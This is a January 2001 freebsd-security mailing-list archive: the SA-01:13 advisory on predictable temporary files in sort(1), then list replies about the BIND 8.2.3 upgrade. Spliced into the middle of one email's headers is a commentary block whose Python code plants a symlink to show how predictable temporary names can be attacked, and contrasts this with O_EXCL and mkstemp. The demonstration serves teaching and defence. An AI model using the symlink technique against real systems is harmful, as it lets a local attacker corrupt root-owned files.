To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:13.sort
Reply-To: security-advisories@freebsd.org
Message-Id: <20010129211919.5B75F37B699@hub.freebsd.org>
Date: Mon, 29 Jan 2001 13:19:19 -0800 (PST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:13                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          sort uses insecure temporary files

Category:       core
Module:         sort
Announced:      2001-01-29
Credits:        Discovered during internal auditing
Affects:        FreeBSD 3.x (all releases),
                FreeBSD 4.x (all releases prior to 4.2),
                FreeBSD 3.5-STABLE prior to the correction date.
Corrected:      2000-11-11 (FreeBSD 4.1.1-STABLE)
                2001-01-01 (FreeBSD 3.5-STABLE)
FreeBSD only:   NO

I.   Background

sort(1) is a program to sort lines of text. It is externally maintained,
contributed software which is included in FreeBSD by default.

II.  Problem Description

During internal auditing, sort(1) was found to use easily predictable
temporary file names. It does create these temporary files correctly such
that they cannot be "subverted" by a symlink attack, but the program will
abort if the temporary filename chosen is already in use. This allows an
attacker to cause the sort(1) command to abort, which may have a cascade
effect on other scripts which make use of it (such as system management and
reporting scripts). For example, it may be possible to use this failure
mode to hide the reporting of malicious system activity which would
otherwise be detected by a management script.

All released versions of FreeBSD prior to the correction date including
FreeBSD 3.5.1 and FreeBSD 4.1.1 are vulnerable. The problem was corrected
prior to the release of FreeBSD 4.2.

III. Impact

Attackers can cause the operation of sort(1) to fail, possibly disrupting
aspects of system operation.

IV.  Workaround

None appropriate.

V.   Solution

One of the following:

Upgrade the vulnerable FreeBSD system to FreeBSD 3.5-STABLE, 4.2-RELEASE,
or 4.2-STABLE after the correction date.

To patch your present system: download the relevant patch from the below
location, and execute the following commands as root:

[FreeBSD 4.1.1 base system]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-4.1.1.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-4.1.1.patch.asc

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/gnu/usr.bin/sort
# patch -p < /path/to/patch
# make depend && make all install

[FreeBSD 3.5.1 base system]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-3.5.1.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-3.5.1.patch.asc

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/gnu/usr.bin/sort
# patch -p < /path/to/patch
# make depend && make all install

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOnXd6VUuHi5z0oilAQF0XAP/d2M9nevTRLhEqTzutYfj2Whxxm1P8HgW
1hRPi3n3r9I7m9cBCjree6N33CRJoa0pdKovL5OgC04AWdRSKhfVHsLJYQz41Vi2
tfqfZCTdhCWmwx9TGeVek9Pk3OrUIwhfzg+YBqX+ioQYaenB+25FHK1cigmXdeWp
UZWDyGlrmyM=
=vOx+
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jan 29 13:27:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id A792737B698 for ; Mon, 29 Jan 2001 13:27:00 -0800 (PST)
Received: from wkst (virtual2.sysadmin-inc.com [209.16.228.145]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id QAA22201 for ; Mon, 29 Jan 2001 16:27:21 -0500
Reply-To:
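SA-01:12 (periodic) and SA-01:13 (sort) are two outcomes of the same mistake, a temporary file whose name is predictable, and the advisories describe them in prose only. The following is an added example, not code from periodic, sort or the FreeBSD advisories, that plays a local attacker against three ways of writing a temporary file inside a scratch directory that stands in for /tmp. The `/tmp/<name>.<pid>` scheme, the pid 4242 and the file names are constructed for the demonstration. With a plain open(2) the root job writes through the attacker's symlink (the periodic case); with `O_EXCL` nothing is corrupted but the job aborts with EEXIST, since `O_CREAT|O_EXCL` refuses a path that exists even as a dangling or foreign symlink (the sort case); with mkstemp(3) the name is unguessable and created atomically, so there is nothing for the attacker to occupy.

```python
import os
import tempfile


def predictable_name(tmpdir, prefix, pid):
    """The classic scheme: the name depends only on a guessable pid."""
    return os.path.join(tmpdir, f"{prefix}.{pid}")


def write_report_unsafe(path, data):
    """periodic-style: open() follows whatever symlink sits at `path`,
    so a root-owned job writes its output into the symlink's target."""
    with open(path, "w") as f:
        f.write(data)


def write_report_exclusive(path, data):
    """sort-style: O_EXCL refuses to follow the symlink or reuse the file,
    so nothing is corrupted, but the job aborts whenever the name is taken."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def write_report_mkstemp(tmpdir, prefix, data):
    """Fixed: mkstemp(3) chooses an unguessable name and creates it with
    O_EXCL in one step; returns the path actually used."""
    fd, path = tempfile.mkstemp(prefix=prefix + ".", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def run_attacks():
    """Play the local attacker against all three writers; report what happened."""
    outcome = {}
    with tempfile.TemporaryDirectory() as tmpdir:
        # Constructed victim: stands in for any root-owned file on the system.
        victim = os.path.join(tmpdir, "victim.conf")
        with open(victim, "w") as f:
            f.write("original\n")

        pid = 4242                                   # constructed: guessed pid
        planted = predictable_name(tmpdir, "daily", pid)
        os.symlink(victim, planted)                  # the attacker's move

        # 1. non-exclusive open: the job's output lands in victim.conf
        write_report_unsafe(planted, "attacker\n")
        with open(victim) as f:
            outcome["unsafe_corrupted_victim"] = f.read() == "attacker\n"

        # 2. exclusive open on the same planted name: EEXIST, job aborts
        try:
            write_report_exclusive(planted, "report\n")
            outcome["exclusive_aborted"] = False
        except FileExistsError:
            outcome["exclusive_aborted"] = True

        # 3. mkstemp: a fresh name the attacker could not have pre-created
        path = write_report_mkstemp(tmpdir, "daily", "report\n")
        with open(path) as f:
            body = f.read()
        outcome["mkstemp_wrote_fresh_file"] = (
            path != planted and not os.path.islink(path) and body == "report\n"
        )
    return outcome


if __name__ == "__main__":
    print(run_attacks())
```

The second case is why "None appropriate" is the honest workaround for SA-01:13: an exclusive create is already the right call, and the only thing left to fix is the name, which is what mkstemp(3) (or `mktemp -t` in a shell script) supplies.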
From: "Peter Brezny" To: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Mon, 29 Jan 2001 16:25:57 -0500 Message-ID: <005901c08a3a$121869e0$46010a0a@sysadmininc.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010129124450.A26735@xor.obsecurity.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org named -v on my 4.2-stable system reports 8.2.3-T6B From the advisory I was under the impression that this one was ok. Did I miss something? Peter Brezny SysAdmin Services Inc. -----Original Message----- 
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 3:45 PM To: Si. Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? On Mon, Jan 29, 2001 at 07:55:44PM +0000, Si. wrote: > 1) The nice people ISC. > 2) The nice people at freebsd-security, i.e. Kris and his team ? It's fixed in BIND 8.2.3, which is being imported into 4.x and 3.x as we speak (it's already in -current). I had hoped to have it done by the time the advisories were released, but circumstances conspired to prevent it. The timing of our advisory 01:10 last week has potential for confusion, but that does not relate to these recent bugs. We hope to have a new advisory out in a couple of days, but in the meantime everyone is urged to upgrade to 4.2-STABLE or 3.5-STABLE once the upgrades are in, or switch to the bind8 port (also not yet updated). I'll drop another note when the relevant upgrades are in place. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:36:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 0530337B404 for ; Mon, 29 Jan 2001 13:36:29 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id BB504BA2AF; Mon, 29 Jan 2001 13:36:58 -0800 (PST) Date: Mon, 29 Jan 2001 13:36:58 -0800 
From: Kris Kennaway To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Message-ID: <20010129133658.A27202@xor.obsecurity.org> References: <20010129124450.A26735@xor.obsecurity.org> <005901c08a3a$121869e0$46010a0a@sysadmininc.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="UlVJffcvxoiEqYs2" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005901c08a3a$121869e0$46010a0a@sysadmininc.com>; from peter@sysadmin-inc.com on Mon, Jan 29, 2001 at 04:25:57PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --UlVJffcvxoiEqYs2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 29, 2001 at 04:25:57PM -0500, Peter Brezny wrote: > named -v on my 4.2-stable system reports 8.2.3-T6B >=20 > >From the advisory I was under the impression that this one was ok. Did I > miss something? Yes, it affects all versions before 8.2.3-RELEASE. Kris --UlVJffcvxoiEqYs2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6deJ6Wry0BWjoQKURAt72AJ0XQjUEHi8yit1WMVIY1KuMJSfCUQCgiddy hj87wC5IP8ywmFor6356d8s= =pwkm -----END PGP SIGNATURE----- --UlVJffcvxoiEqYs2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:37:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id D3F5337B6A5; Mon, 29 Jan 2001 13:37:25 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 2E276BA2AF; Mon, 29 Jan 2001 13:37:56 -0800 (PST) Date: Mon, 29 Jan 2001 13:37:56 -0800 
From: Kris Kennaway To: Dan Langille Cc: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd Message-ID: <20010129133756.B27202@xor.obsecurity.org> References: <20010129203514.6F88237B6A4@hub.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KFztAG8eRSV9hGtP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from dan@langille.org on Tue, Jan 30, 2001 at 10:11:49AM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --KFztAG8eRSV9hGtP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 10:11:49AM +1300, Dan Langille wrote: > This patch won't work as advertised: Ok, we'll have to be more careful with that in future. Thanks. Kris --KFztAG8eRSV9hGtP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6deKzWry0BWjoQKURAvz1AJ0XXe2s/ohWbPM6m4xv6TYd7xfayACglcMb TfyF3bRfNuaBfjboJRzzqrs= =KCGT -----END PGP SIGNATURE----- --KFztAG8eRSV9hGtP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 14:32:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 860BF37B404 for ; Mon, 29 Jan 2001 14:32:31 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 3D7F0BA4E8; Mon, 29 Jan 2001 14:33:01 -0800 (PST) Date: Mon, 29 Jan 2001 14:33:00 -0800 
From: Kris Kennaway To: security@freebsd.org Subject: BIND 8.2.3 upgrade available Message-ID: <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NzB8fVQJ5HfG6fxh" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --NzB8fVQJ5HfG6fxh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be updated tomorrow). Some of the cvsup mirrors may take a little while to receive the update though, so be warned. They should all have it in an hour or so. I have also just upgraded the net/bind8 port, which is another option for those of you running 3.x (or 2.x for that matter), or who can't afford to do a full buildworld right now. Remember to switch named_program in /etc/rc.conf to use the new version, if you install the port. Kris --NzB8fVQJ5HfG6fxh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6de+cWry0BWjoQKURAtlZAKDvHbrJPLmQ86kpMKiD2ifVF7AOXQCfYBE1 UXJRh/PDSyW38WgjpFIlfUM= =i9Zj -----END PGP SIGNATURE----- --NzB8fVQJ5HfG6fxh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 14:46:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id 8057237B6A0 for ; Mon, 29 Jan 2001 14:46:35 -0800 (PST) Received: from wkst (virtual2.sysadmin-inc.com [209.16.228.145]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id RAA25189 for ; Mon, 29 Jan 2001 17:46:58 -0500 Reply-To: 
From: "Peter Brezny" To: Subject: RE: BIND 8.2.3 upgrade available Date: Mon, 29 Jan 2001 17:45:33 -0500 Message-ID: <006901c08a45$30d64860$46010a0a@sysadmininc.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010129143300.A38419@xor.obsecurity.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a big reason why anyone would not want to just go ahead and run bind 9? TIA Peter Brezny SysAdmin Services Inc. -----Original Message----- 
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 5:33 PM To: security@FreeBSD.ORG Subject: BIND 8.2.3 upgrade available Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be updated tomorrow). Some of the cvsup mirrors may take a little while to receive the update though, so be warned. They should all have it in an hour or so. I have also just upgraded the net/bind8 port, which is another option for those of you running 3.x (or 2.x for that matter), or who can't afford to do a full buildworld right now. Remember to switch named_program in /etc/rc.conf to use the new version, if you install the port. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15: 1: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id D127737B699 for ; Mon, 29 Jan 2001 15:00:44 -0800 (PST) Received: (from root@localhost) by cage.simianscience.com (8.11.1/8.11.1) id f0TN0h391810; Mon, 29 Jan 2001 18:00:43 -0500 (EST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.2/8.11.1av) with ESMTP id f0TN0b791802; Mon, 29 Jan 2001 18:00:37 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010129175758.03255570@marble.sentex.net> X-Sender: mdtancsa@marble.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 29 Jan 2001 18:00:36 -0500 To: , 
From: Mike Tancsa Subject: RE: BIND 8.2.3 upgrade available In-Reply-To: <006901c08a45$30d64860$46010a0a@sysadmininc.com> References: <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: >Is there a big reason why anyone would not want to just go ahead and run >bind 9? I dont think all the features are there yet. At least the last time I looked at it, there were some things unimplemented. Also, the configuration is not totally compatible. I also found it to be a little unpredictable when I tried version 9.0.1. Perhaps its more stable now, but I personally would wait another month or so for it to shake out. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15:20:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id A0BB637B699 for ; Mon, 29 Jan 2001 15:20:23 -0800 (PST) Received: from pozitif.net ([62.29.24.236]) by pozitif.net ; Tue, 30 Jan 2001 01:28:32 +0200 Message-ID: <3A75FABD.AA021EE2@pozitif.net> Date: Tue, 30 Jan 2001 01:20:29 +0200 
From: Mehmet Hinc
X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: bind8.2.3 and installation problem
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Patching file doc/man/Makefile using Plan A...
Hunk #1 succeeded at 52.
Hunk #2 succeeded at 105.
done
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- src/bin/Makefile.orig	Sat Dec 23 00:02:48 2000
|+++ src/bin/Makefile	Mon Jan 29 14:11:13 2001
--------------------------
Patching file src/bin/Makefile using Plan A...
Hunk #1 failed at 58.
1 out of 1 hunks failed--saving rejects to src/bin/Makefile.rej
done
>> Patch patch-ac failed to apply cleanly.
>> Patch(es) patch-aa patch-ab applied cleanly.
*** Error code 1

Stop in /usr/ports/net/bind8.
*** Error code 1

Stop in /usr/ports/net/bind8.
*** Error code 1

What??? Why??? I updated my ports and tried to install bind8.2.3 because
bind8.2.2 has had a vulnerability, so while I was installing it I got the
error messages above. Please let me know how I can fix it!

Thanks all

Mehmet Hinc
From Turkey

From owner-freebsd-security Mon Jan 29 15:32: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 151EE37B69D for ; Mon, 29 Jan 2001 15:31:47 -0800 (PST)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0TNViq04311; Mon, 29 Jan 2001 15:31:44 -0800 (PST)
Date: Mon, 29 Jan 2001 15:31:44 -0800
From: Alfred Perlstein To: Kris Kennaway Cc: security@FreeBSD.ORG Subject: Re: BIND 8.2.3 upgrade available Message-ID: <20010129153144.H26076@fw.wintelcom.net> References: <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010129143300.A38419@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Jan 29, 2001 at 02:33:00PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Kris Kennaway [010129 14:34] wrote: > Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be > updated tomorrow). Some of the cvsup mirrors may take a little while > to receive the update though, so be warned. They should all have it in > an hour or so. > > I have also just upgraded the net/bind8 port, which is another option > for those of you running 3.x (or 2.x for that matter), or who can't > afford to do a full buildworld right now. Remember to switch > named_program in /etc/rc.conf to use the new version, if you install > the port. Is there any chance that the bind and sendmail people could backport -DNO_SENDMAIL and -DNO_NAMED to 3.x (and maybe 2.x)? I may take a shot at it, but it'd be a nice thing to add to /etc/make.conf on older boxes. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15:52:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B36D137B69E for ; Mon, 29 Jan 2001 15:52:25 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id SAA45703; Mon, 29 Jan 2001 18:52:06 -0500 (EST) (envelope-from wollman) Date: Mon, 29 Jan 2001 18:52:06 -0500 (EST) 
From: Garrett Wollman Message-Id: <200101292352.SAA45703@khavrinen.lcs.mit.edu> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: RE: BIND 8.2.3 upgrade available In-Reply-To: <4.2.2.20010129175758.03255570@marble.sentex.net> References: <20010129143300.A38419@xor.obsecurity.org> <006901c08a45$30d64860$46010a0a@sysadmininc.com> <4.2.2.20010129175758.03255570@marble.sentex.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I dont think all the features are there yet. At least the last time I > looked at it, there were some things unimplemented. At LISA, Vixie said that 9.0 was probably not what most people wanted, but 9.1 should be solid. Unfortunately, 9.1 still lacks some features (like `ndc status') -- but it has gained some new useful ones, like the ability to do `ndc' over the network, securely. I'm running it on my desktop right now, and we may well deploy it to our servers next month if no ``interesting'' bugs appear. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 16: 6:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id 5405E37B69E for ; Mon, 29 Jan 2001 16:06:01 -0800 (PST) Received: from pozitif.net ([62.29.24.236]) by pozitif.net ; Tue, 30 Jan 2001 02:14:13 +0200 Message-ID: <3A760579.3126158B@pozitif.net> Date: Tue, 30 Jan 2001 02:06:17 +0200 
From: Mehmet Hinc
X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: bind8.2.3 and installation problem
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Patching file doc/man/Makefile using Plan A...
Hunk #1 succeeded at 52.
Hunk #2 succeeded at 105.
done
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- src/bin/Makefile.orig	Sat Dec 23 00:02:48 2000
|+++ src/bin/Makefile	Mon Jan 29 14:11:13 2001
--------------------------
Patching file src/bin/Makefile using Plan A...
Hunk #1 failed at 58.
1 out of 1 hunks failed--saving rejects to src/bin/Makefile.rej
done
>> Patch patch-ac failed to apply cleanly.
>> Patch(es) patch-aa patch-ab applied cleanly.
*** Error code 1

Stop in /usr/ports/net/bind8.
*** Error code 1

Stop in /usr/ports/net/bind8.
*** Error code 1

What??? Why??? I updated my ports and tried to install bind8.2.3 because
bind8.2.2 has had a vulnerability, so while I was installing it I got the
error messages above. Please let me know how I can fix it!

Thanks all

Mehmet Hinc
From Turkey

From owner-freebsd-security Mon Jan 29 16:38:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 55D9F37B404 for ; Mon, 29 Jan 2001 16:38:22 -0800 (PST)
Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta0/8.12.0.Beta0) id f0U0cKTs006954; Mon, 29 Jan 2001 16:38:20 -0800 (PST)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14966.3324.107528.104198@horsey.gshapiro.net>
Date: Mon, 29 Jan 2001 16:38:20 -0800
From: Gregory Neil Shapiro
To: Alfred Perlstein
Cc: Kris Kennaway , security@FreeBSD.ORG
Subject: Re: BIND 8.2.3 upgrade available
In-Reply-To: <20010129153144.H26076@fw.wintelcom.net>
References: <20010129143300.A38419@xor.obsecurity.org> <20010129153144.H26076@fw.wintelcom.net>
X-Mailer: VM 6.90 under 21.2 (beta41) "Polyhymnia" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

bright> Is there any chance that the bind and sendmail people could backport
bright> -DNO_SENDMAIL and -DNO_NAMED to 3.x (and maybe 2.x)?

What does the BIND bug have to do with sendmail?

From owner-freebsd-security Mon Jan 29 17: 2:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from andromeda.frogtongue.com (dsl-006-a.resnet.purdue.edu [128.211.160.82]) by hub.freebsd.org (Postfix) with ESMTP id EF6A637B402 for ; Mon, 29 Jan 2001 17:02:39 -0800 (PST)
Received: from localhost (remy@localhost) by andromeda.frogtongue.com (8.11.1/8.11.0) with ESMTP id f0U12BK18200; Mon, 29 Jan 2001 20:02:17 -0500 (EST) (envelope-from remy@frogtongue.com)
Date: Mon, 29 Jan 2001 20:02:11 -0500 (EST)
From: Remy Wisaksono To: Kris Kennaway Cc: Peter Brezny , freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? In-Reply-To: <20010129133658.A27202@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I upgraded my bind8.2.3-T6B and when typing the "named -v" command, I get the 8.2.3-T6B version. When typing the following command, "nslookup -q=txt -class=CHAOS version.bind. 0" I got; VERSION.BIND text = "8.2.3-REL" (also I did check my log file ....everything looks good now.) --------------------- Remy Wisaksono scytale_z@hotmail.com remy@frogtongue.com --------------------- On Mon, 29 Jan 2001, Kris Kennaway wrote: > On Mon, Jan 29, 2001 at 04:25:57PM -0500, Peter Brezny wrote: > > named -v on my 4.2-stable system reports 8.2.3-T6B > > > > From the advisory I was under the impression that this one was ok. Did I > > miss something? > > Yes, it affects all versions before 8.2.3-RELEASE. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17: 9: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 3586137B402 for ; Mon, 29 Jan 2001 17:08:43 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0U18MO81199; Mon, 29 Jan 2001 17:08:22 -0800 (PST) (envelope-from dillon) Date: Mon, 29 Jan 2001 17:08:22 -0800 (PST) 
